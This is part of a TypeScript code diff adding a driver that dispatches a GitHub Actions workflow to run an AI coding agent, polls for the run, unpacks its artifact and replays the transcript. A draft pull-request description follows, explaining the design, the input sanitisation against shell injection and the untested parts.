+      if (now() >= deadline) throw new Error(`Timed out waiting for the GitHub Actions run (${correlationId}).`)
+      this.throwIfAborted()
+      await sleep(interval)
+      this.throwIfAborted()
+    }
+  }
+
+  /** Our run among the workflow's recent ones, or undefined while GitHub is still creating it. */
+  private async findRun(correlationId: string): Promise<WorkflowRun | undefined> {
+    const body = await this.api<{ workflow_runs?: WorkflowRun[] }>(`/repos/${this.owner}/actions/runs?event=workflow_dispatch&per_page=50`)
+    return (body.workflow_runs ?? []).find(run => typeof run.name === 'string' && run.name.includes(correlationId))
+  }
+
+  /** Download the run's artifact and pull the transcript and the pushed branch out of it. */
+  private async readRunArtifact(runId: number, correlationId: string): Promise<{ execution: string; branch?: string }> {
+    const list = await this.api<{ artifacts?: { id: number; name: string }[] }>(`/repos/${this.owner}/actions/runs/${runId}/artifacts`)
+    const artifact = (list.artifacts ?? []).find(a => a.name.includes(correlationId)) ?? list.artifacts?.[0]
+    if (!artifact) throw new Error(`Run ${runId} uploaded no artifact; the workflow's collect step did not run.`)
+
+    const res = await this.request(`/repos/${this.owner}/actions/artifacts/${artifact.id}/zip`)
+    const entries = readZip(Buffer.from(await res.arrayBuffer()))
+    const execution = entries.find(e => e.name.endsWith('execution.json'))
+    if (!execution) throw new Error(`Artifact ${artifact.name} has no execution.json (entries: ${entries.map(e => e.name).join(', ') || 'none'})`)
+
+    const meta = entries.find(e => e.name.endsWith('meta.json'))
+    const branch = meta ? readBranch(meta.data.toString('utf8')) : undefined
+    return { execution: execution.data.toString('utf8'), ...(branch ? { branch } : {}) }
+  }
+
+  private get owner(): string {
+    return `${this.config.owner}/${this.config.repo}`
+  }
+
+  private throwIfAborted(): void {
+    if (this.startOpts.signal?.aborted) throw new Error('Session aborted while waiting for the GitHub Actions run.')
+  }
+
+  /** A REST call that expects JSON back. */
+  private async api<T = unknown>(path: string, init?: RequestInit): Promise<T> {
+    const res = await this.request(path, init)
+    if (res.status === 204) return undefined as T
+    return (await res.json()) as T
+  }
+
+  /** A REST call, with auth and error handling. */
+  private async request(path: string, init: RequestInit = {}): Promise<Response> {
+    const doFetch = this.config.fetch ?? (globalThis.fetch as FetchLike)
+    const res = await doFetch(`${this.config.apiBase ?? 'https://api.github.com'}${path}`, {
+      ...init,
+      headers: {
+        accept: 'application/vnd.github+json',
+        authorization: `Bearer ${this.config.token}`,
+        'x-github-api-version': '2022-11-28',
+        ...(init.body ? { 'content-type': 'application/json' } : {}),
+        ...init.headers,
+      },
+    })
+    if (!res.ok) throw new Error(`GitHub API ${init.method ?? 'GET'} ${path} failed (${res.status} ${res.statusText}): ${await safeText(res)}`)
+    return res
+  }
+}
+
+/** A workflow run, as much of it as we read. */
+interface WorkflowRun {
+  id: number
+  name?: string
+  status?: string
+  conclusion?: string | null
+  html_url?: string
+}
+
+/**
+ * Turn the action's `execution_file` into a turn, replaying its events on the way.
+ *
+ * The adapter is thin on purpose: the file is a JSON **array** of exactly the
+ * SDKMessage objects the CLI emits one-per-line, so the existing
+ * {@link StreamJsonParser} reads it verbatim once the array is unwrapped. The whole
+ * difference between running locally and running on a runner is array-vs-JSONL.
+ *
+ * Events replay in a burst at the end rather than live — that is the honest cost of
+ * this driver, and the dashboard sees the same event stream either way.
+ */
+export function replayTranscript(json: string, emit: (event: DriverEvent) => void = () => {}): DriverTurn {
+  let messages: unknown
+  try {
+    messages = JSON.parse(json)
+  } catch (err) {
+    throw new Error(`Could not parse the run transcript as JSON: ${(err as Error).message}`)
+  }
+  if (!Array.isArray(messages)) throw new Error('The run transcript is not a JSON array of messages.')
+
+  const parser = new StreamJsonParser()
+  for (const message of messages) {
+    for (const event of parser.push(JSON.stringify(message))) emit(event)
+  }
+  return parser.result()
+}
+
+/** The branch the run pushed, from the workflow's `meta.json`. Absent when the agent pushed nothing. */
+function readBranch(json: string): string | undefined {
+  try {
+    const meta = JSON.parse(json) as Record<string, unknown>
+    const branch = meta['branch']
+    return typeof branch === 'string' && branch ? branch : undefined
+  } catch {
+    return undefined // A malformed meta file costs us `readCode`, not the turn.
+  }
+}
+
+/** Reject anything that is not an opaque id, since these reach a shell on the runner. */
+function assertToken(value: string, what: string): string {
+  if (!/^[A-Za-z0-9._:-]+$/.test(value)) throw new Error(`Refusing to pass an unsafe ${what} to the workflow: ${value}`)
+  return value
+}
+
+/** An error body, best-effort — a failure to read one must not replace the real error. */
+async function safeText(res: Response): Promise<string> {
+  try {
+    return (await res.text()).slice(0, 500)
+  } catch {
+    return '<no body>'
+  }
+}

--- a/packages/framework/src/driver/index.ts
+++ b/packages/framework/src/driver/index.ts
@@ -24,6 +24,8 @@ export {
   type McpServerSpec,
   type PermissionMode,
 } from './claude-code.js'
+export { ActionsDriver, ActionsSession, replayTranscript, type ActionsDriverOptions, type FetchLike } from './actions.js'
+export { readZip, type ZipEntry } from './actions-zip.js'
 export {
   runAgentCli,
   type AgentCliParser,


### PR DESCRIPTION
Part of #610. The spike I asked about in the correction comment: does the dispatch, poll, parse round trip actually work behind the existing seam. It does.

Draft on purpose, and no changeset: this is the build-or-park evidence, not a shipped feature.

## What is here

- `driver/actions.ts`: `ActionsDriver` / `ActionsSession`. `prompt()` dispatches the workflow, polls the run, reads the artifact, returns a `DriverTurn`.
- `driver/actions-zip.ts`: a ~60 line read-only zip reader. The artifact download API always returns a zip and Node ships deflate but no zip, and this did not seem worth a runtime dependency.
- `.github/workflows/framework-agent.yml`: the workflow it dispatches.
- 19 tests, all against an injected `fetch`. Full suite green (1030 passing), typecheck clean.

## What the spike settled

**It fits `Driver`/`DriverSession` as written.** No `collect()`, no new methods, unlike the WebDriver attempt in the closed #623.

**The adapter is nearly free.** `execution_file` is a JSON array of exactly the SDKMessage objects the CLI streams one per line, so the existing `StreamJsonParser` reads it verbatim once the array is unwrapped. Local and remote differ by array-vs-JSONL and nothing else.

**Continuity is the branch, not the machine.** Every turn is a fresh runner and a fresh checkout, so the session tracks the branch each run pushed and dispatches the next turn onto it. `readCode` reads that branch over the contents API, since the workspace is gone by the time we want to look at it.

**Correlation needs the run name.** The dispatch API answers 204 with no body, so there is no run id to hold. The driver generates a correlation id, the workflow echoes it into `run-name` and the artifact name, and the driver finds its own run that way.

## Answers to the three asks

| Ask | Here |
|---|---|
| Always toggle `Auto` | `--dangerously-skip-permissions` in the workflow. Required, not optional: agent mode grants nothing by default |
| Select all TF repos | per run, but one dispatch per repo, since the run token is single-repo |
| Forward the model (#628) | `model` input, passed through as `--model` |

## Costs, unchanged from the comment

1. Minutes, not seconds, per turn.
2. No live stream. Events replay in a burst when the transcript lands, so the dashboard feed gets coarser.
3. No mid-run Q&A. An AWAIT gate has to end the run and re-dispatch with `--resume`, which the session already threads.

## Two judgement calls worth a look

**Framing rides in front of the prompt, not `--append-system-prompt`.** Composing `claude_args` in the workflow would mean shell-quoting a multi-line system prompt, and that is an injection seam for a cosmetic gain. The prompt is an action input, never touched by a shell, so prepending is safe. Same thing Codex already does. Swappable later.

**`model` and `resume_session_id` do reach a shell, as env vars.** The workflow composes args from environment variables rather than `${{ }}` interpolation, and the driver additionally rejects anything outside `[A-Za-z0-9._:-]`. Belt and braces because these two are the only values that get near a command line.

## Not done

Never run against real GitHub. It needs a repo secret (`CLAUDE_CODE_OAUTH_TOKEN` from `claude setup-token`) and the workflow has to be on the default branch before `workflow_dispatch` can target it, so the first live run is a merge-then-try. Everything above is proven against an injected `fetch`, not against the real API.

Also not wired into agent selection or the CLI. That is the build half, and it waits on the build-or-park answer.